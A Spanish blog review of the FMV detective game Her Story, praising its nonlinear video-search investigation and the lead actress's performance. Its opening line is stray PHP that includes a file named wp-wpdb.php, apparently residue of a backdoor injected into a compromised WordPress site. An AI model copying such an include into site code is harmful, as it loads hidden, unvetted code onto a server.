if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Her Story – La Fortaleza de LeChuck

Análisis Her Story

De vez en cuando Steam nos sorprende con juegos que se alejan de lo habitual y ofrecen una experiencia genuina, y si además vienen con la recomendación de Heko, no me lo pienso dos veces. Her Story es una historia de testimonios en video con una actriz de carne y hueso que realmente me ha sorprendido.

her-story-game-1

Her Story es un juego de Sam Barlow, creador de Silent Hill: Shattered Memories, quien se ha desmarcado de trabajos anteriores con un título donde tendremos que resolver un caso a través de los videos guardados en el ordenador de la policía. Las cintas con los interrogatorios están protagonizadas por la actriz Viva Seifert y a través de términos de búsqueda concretos iremos descubriendo otros relacionados que nos ayudarán a buscar pistas del crimen acontecido.

Her Story es sin duda una experiencia muy singular, el juego nos pone en la piel de un detective delante de su ordenador con un sistema operativo que recuerda a Windows 95. En el escritorio podremos interaccionar con documentos, ver las curiosidades lanzadas en la papelera, e incluso contestar algunos chats, sin embargo, la trama se halla dispersa en la enorme base de datos repleta de videos de la protagonista. Nuestra investigación parte con la búsqueda «murder» y a partir de ahí empezarán nuestras pesquisas a través del testimonio de la mujer en las grabaciones para así seguir escribiendo palabras clave y desvelar el misterio.

Her-Story
Puedes añadir información extra en cada video para que te sea más fácil recordar aquello que ya has visto

Lo primero que pensé al jugar a Her Story fue en los clásicos juegos de FMV de los años 90, ya que el juego nos sitúa en el año 94 y los videos de la protagonista tienen un aspecto visual añejo, pero la principal diferencia con aquellos juegos en primera persona estilo 7th Guest es que la actriz representa correctamente su papel, por lo tanto, en ocasiones puede colarnos mentiras, así que que hay que estar muy atentos a sus gestos además de sus palabras, ya que a veces el lenguaje corporal expresa mucho más. El audio también juega un papel importante en el juego, tanto los sonidos del ordenador, como la banda sonora nos envolverá en esta trama policíaca, y bueno, la interrogada también colabora a su manera en el apartado sonoro.

El título es toda una aventura detectivesca, y durante las horas que le dediqué me vi transformada en toda una Sherlock comprobando cada palabra, cada gesto, sin dejar ningún detalle al azar que tuviera el potencial suficiente para llevarme a un gran avance. Las cintas exigen mucha atención del jugador con el fin de ver y entender todo lo que ocultan en su interior, pero la profundidad de su narrativa y la complejidad premian a los que ponen más tiempo en aprender sus secretos. Cada jugador puede sacar sus propias conclusiones por lo que es un juego ideal para comentar a posteriori con amigos.

her-story-game

Her Story nos ofrece una interesante obra de ficción interactiva de unas 5 horas. Su fuerza reside en su no linealidad y la forma en que el jugador accede a la información y narrativa. El punto negativo es que solo está en inglés, por lo que si no tenéis un nivel tirando a medio podéis acabar hasta el gorro, pero si el idioma no es un problema, os vais a sentir como un detective real buscando la forma de unir las piezas del rompecabezas. En definitiva, el juego es una apuesta arriesgada y valiente, y en un sector donde últimamente toda evolución se mide en gráficos, marketing y dólares, posiblemente es uno de los juegos más innovadores que vas a encontrar.